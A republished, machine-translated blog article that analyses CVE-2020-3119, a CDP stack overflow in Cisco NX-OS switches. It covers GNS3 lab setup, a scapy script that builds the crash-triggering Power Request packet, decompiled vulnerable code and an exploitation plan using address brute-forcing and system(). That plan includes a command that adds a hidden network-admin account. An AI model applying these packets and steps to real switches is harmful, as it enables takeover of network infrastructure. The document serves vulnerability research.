Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to achieve Cisco CDP protocol stack overflow vulnerability CVE-2020-3119 analysis, the content of the article is of high quality, so the editor shares it for you to do a reference. I hope you will have a certain understanding of the relevant knowledge after reading this article.

Cisco Discovery Protocol (CDP) protocol is a link layer protocol used to discover Cisco devices in a local area network. Recently, there have been several loopholes in the Cisco CDP protocol, picking a stack overflow CVE-2020-3119 to do it first, and Armis Labs has also made their analysis Paper public.

Environment building

Although I have been working on IoT-related recently, it is the first time to work on such a medium-sized device with a relatively complex architecture, and most of my time is still spent in a messy environment.

3119 this CVE affects Cisco NX-OS-type devices. Go to the security center of Cisco to find the CVE and search for the affected devices. It is found that the devices affected by this vulnerability are very expensive and difficult to buy, so there is no real machine testing and research for the time being. Then searched the firmware of the relevant equipment, which needs to be purchased by krypton gold. Then went to the omnipotent Taobao to search, there is a purchasing agent business, some buy 50 or 60 (loss), some sell more than ten yuan.

After I got the firmware, my first thought was to untie it, and my second thought was to run. At first I wanted to unlock the firmware and look for the binary of cdp, but I encountered a hole when I unlocked the firmware.

In this day and age, the only tool to unlock firmware is binwalk. I only know this one, and I have asked my friends that there seems to be nothing else to use. (if so, ask for recommendation).

But binwalk's algorithm is very time-consuming when it comes to a lot of compressed packages. Anyway, I've been there for two days and haven't finished decompressing half of it yet. It took a long time to decompress the firmware, but it ended in vain.

Finally, we can only find a way to get the firmware running, just know that a software can be used to simulate Cisco devices-GNS3.

Instructions for using GNS3

After learning to use GNS3, I found that the software is really easy to use.

First we need to download the secure GNS3 software, and then we need to download GNS3 VM. A GNS3 installed on a personal computer provides the function of visual operation, which can be regarded as a general control. GNS3 VM is a server that acts as GNS3 and can be run locally or remotely using a virtual machine. The devices emulated by GNS3 are all running on the GNS3 server.

1. Set up the GNS3 VM first.

two。 Create a new template

3. Select switch Cisco NX-OSv 9000

Here we find that we use qemu to simulate the device, so we need to download qcow2 before downloading.

The corresponding version of the firmware is then imported into GNS3 Server.

After the import is complete, you can see the newly added device in the switch column.

4. Drag the Cisco device to the center and use the network cable to directly connect the device

To explain here, Toolbox is a ubuntu docker template that I added myself. At first, I used docker to connect to any network card of the switch equipment for operation test.

But then I found out that GNS3 also provides another function, which is the Cloud1 in the figure, which can represent any network card in your host / GNS3 Server.

Because the tools I usually use are in the ubuntu virtual machine in Mac, the method I use now is to have a network card of the ubuntu virtual machine directly connected to the Cisco switch.

PS: after a preliminary study, GNS3 can provide such a simple network direct connection, which can be found on the ubridge,Github developed by itself, and the visual observation is to forward traffic packets through UDP.

During the test, we can also right-click the direct connection to use wireshark to grab the package.

5. Start all nodes

Finally, click the start button on the upper toolbar to start all your devices, or you can choose to start separately if you don't want to start all of them.

Research on Cisco switch

However, at this time, the network is not connected, and it is necessary to connect to the switch through the serial port for network configuration. By default, GNS3 forwards the serial port of the device through telnet, and we can see the ip/ port of telnet through the upper right corner of the GNS3 interface.

Initialization is required for the first time to connect to the switch. After setting up, you can log in to Cisco Management shell with the administrator account password you set.

After research, it is found that the structure of the device is that qemu starts a bootloader, and then there is a nxos.9.2.3.bin file in the file system of bootloader, which is the main firmware of the device. After boot, there is a Linux system, and in the Linux system, another virtual machine, guestshell, and a vsh.bin are launched. In this device, vsh is used instead of bash, which we usually use when using Linux. When we connect to telnet, what we see is the vsh interface. You can set telnet/ssh to be enabled in the vsh command, and you can also enter Linux shell. But you are entering the Linux system in the guestshell virtual machine.

The cdp program of this study can not be seen in the virtual machine guestshell. After follow-up research, it is found that there is a python command in vsh, and this python is a nxpython program that exists in the host of Cisco. So you can get the Linux shell of the Cisco host with python. Then use the mac address to find the network card you set up in GNS3, and set the ip address.

BashCisco# pythonPython 2.7.11 (default, Feb 26 2018, 03:34:16) [GCC 4.6.3] on linux2Type "help", "copyright", "credits" or "license" for more information. > > import os > os.system ("/ bin/bash") bash-4.3$ iduid=2002 (admin) gid=503 (network-admin) groups=503 (network-admin) (network-operator) bash-4.3$ sudo-iroot@Cisco#ifconfig eth8eth8 Link encap:Ethernet HWaddr 0c:76:e2:d1:ac:07 inet addr:192.168.102.21 Bcast:192.168.102.255 Mask:255.255.255.0 UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1 RX packets:82211 errors:61 dropped:28116 overruns:0 frame:61 TX packets:137754 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:6639702 (6 .3 MiB) TX bytes:246035115 (234.6 MiB) root@Cisco#ps aux | grep cdproot 10296 0.00.8 835212 70768? Ss Mar18 0:01 / isan/bin/cdpdroot 24861 0.0 5948 1708 ttyS0 S + 05:30 0:00 grep cdp

After setting up the ip, we can then test the network connectivity in the ubuntu virtual machine on our mac. Normally, the network is connected at this time.

You can then put the public key on the ubuntu virtual machine to the / root/.ssh/authorized_keys of the cisoc device, and then connect to the bash shell of the cisco through ssh. The Linux system of the device comes with a lot of programs, such as gdbserver to be used in subsequent debugging. Nxpython also has scapy installed.

Send CDP packets using scapy

Next, let's take a look at how to send cdp packets. We can see the format of cdp packets in the analysis released by Armis Labs. Similarly, we can also open the cdp of Cisco devices and view the cdp packets sent by Cisco devices.

Cisco#conf terCisco (config) # cdp enable#, for example, Cisco (config) # interface ethernet 1/7Cisco (config-if) # no shutdownCisco (config-if) # cdp enableCisco (config-if) # endCisco# show cdp interface ethernet 1/7Ethernet1/7 is up CDP enabled on interface Refresh time is 60 seconds Hold time is 180 seconds, which is directly connected to me.

Then we can grab the packet of the network card directly through wireshark, or grab the packet through GNS3 to study the format of CDP protocol.

Because I am used to using python to write PoC, I began to study how to use python to send CDP protocol packets, and then found that scapy has some built-in content related to CDP packages.

Here is a simple example:

From scapy.contrib import cdpfrom scapy.all import Ether, LLC, SNAP# link layerl2_packet = Ether (dst= "01:00:0c:cc:cc:cc") # Logical-Link Controll2_packet / = LLC (dsap=0xaa, ssap=0xaa, ctrl=0x03) / SNAP () # Cisco Discovery Protocolcdp_v2 = cdp.CDPv2_HDR (vers=2, ttl=180) deviceid = cdp.CDPMsgDeviceID (val=cmd) portid = cdp.CDPMsgPortID (iface=b "ens38") address = cdp.CDPMsgAddr Addr=cdp.CDPAddrRecordIPv4 (addr= "192.168.1.3") cap= cdp.CDPMsgCapabilities (cap=1) cdp_packet = cdp_v2/deviceid/portid/address/cappacket = l2_packet / cdp_packetsendp (packet) trigger vulnerability

The next step is to figure out how to trigger the vulnerability. First, take the cdpd out of the device, and then throw the binary into the ida to find loopholes. According to the vulnerability analysis released by Armis Labs, it is found that the vulnerability exists in the cdpd_poe_handle_pwr_tlvs function. The related vulnerability codes are as follows:

If ((signed int) v28 > 0) {v35 = (int *) (a3 + 4); v9 = 1; do {v37 = v9-1; v41 [v9-1] = * v35; * (& v40 + v9) = _ byteswap_ulong (* (& v40 + v9)) If (! sdwrap_hist_event_subtype_check (7536640)) {* (_ DWORD *) v38 = 104; snprintf (& s, 0x200u, "pwr_levels_requested [% d] =% d\ n", v37, * (& v40 + v9)); sdwrap_hist_event (7536640, strlen (& s) + 5, v38) } if (sdwrap_chk_int_all (104,0,0,0,0) {v24 = * (& v40 + v9); buginf_ftrace (1, & sdwrap_dbg_modname, 0, "pwr_levels_requested [% d] =% d\ n") } snprintf (v38, 0x3FCu, "1111 pwr_levels_requested [% d] =% d\ n", v37, * (& v40 + v9), v24); sdwrap_his_log_event_for_uuid_inst (124,124,1,0, strlen (v38) + 1, v38); * (_ DWORD *) (A1 + 4 * v9 + 1240) = * (& v40 + v9); + + v35; + + v9 } while (v9! = v28 + 1);}

The subsequent analysis is still based on the Armis Labs vulnerability analysis article, as long as you add Power Request and Power Level to the cdp package to trigger the cdpd program crash:

Power_req = cdp.CDPMsgUnknown19 (val= "aaaa" + "bbbb" * 21) power_level = cdp.CDPMsgPower (power=16) cdp_packet = cdp_v2/deviceid/portid/address/cap/power_req/power_level exploit

First, take a look at the protection of binaries:

$checksec cdpd_9.2.3 Arch: i386-32-little RELRO: No RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled RPATH:'/ isan/lib/convert:/isan/lib:/isanboot/lib'

Found to open only NX and PIE protection, 32-bit program.

Because the program cannot interact and can only send all the payload at once for use, there is no way to disclose the address. Because it is a 32-bit program, the cdpd program will restart automatically after each crash, so we can explode the address.

There are a few points to pay attention to before writing a utilization script:

1. After the stack overflow overwrites the return address, it continues to overwrite the address of the passed-in function parameters.

* (_ DWORD *) (A1 + 4 * v9 + 1240) = * (& v40 + v9)

And because there is such code near the vulnerability code, you need to write a value to the address near the A1 address. If you overwrite only the return address, you cannot achieve the purpose of executing the command simply by jumping to one address. So our payload needs to overwrite A1 with a writable address.

two。 In the cdpd_poe_handle_pwr_tlvs function, many branches go into the cdpd_send_pwr_req_to_poed function, and in this function there is a _ _ memcpy_to_buf function that limits the length of the Power Requested to 40 bytes. Such a short length is not enough for overflow. So we can't go to the branch that will call the function.

V10 = * (_ WORD *) (A1 + 1208); v11 = * (_ WORD *) (A1 + 1204); v12 = * (_ DWORD *) (A1 + 1212); if (v32! = v10 | | v31! = v11)

We need to determine that the condition is False and does not enter the branch. Therefore, the value of the overlaid A1 address needs to be constructed.

3. The ultimate goal of our use is not to execute execve ("/ bin/bash"), because it is impossible to interact, so it is useless to execute this command. So what can we do to use it? First, we can execute code that anti-concatenates shell. Second, we can add an administrator account, such as executing the following command:

/ isan/bin/vsh-c "configure terminal; username test password qweASD123 role network-admin"

We can do this by executing system (cmd). So the next question is how to transmit the parameters? After research, it is found that the contents of DeviceID-related fields in CDP protocol are stored on the heap, and the heap address is stored on the stack. We can adjust the stack address through ret. This allows you to successfully pass arbitrary parameters to the system function.

On how to achieve Cisco CDP protocol stack overflow vulnerability CVE-2020-3119 analysis is shared here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.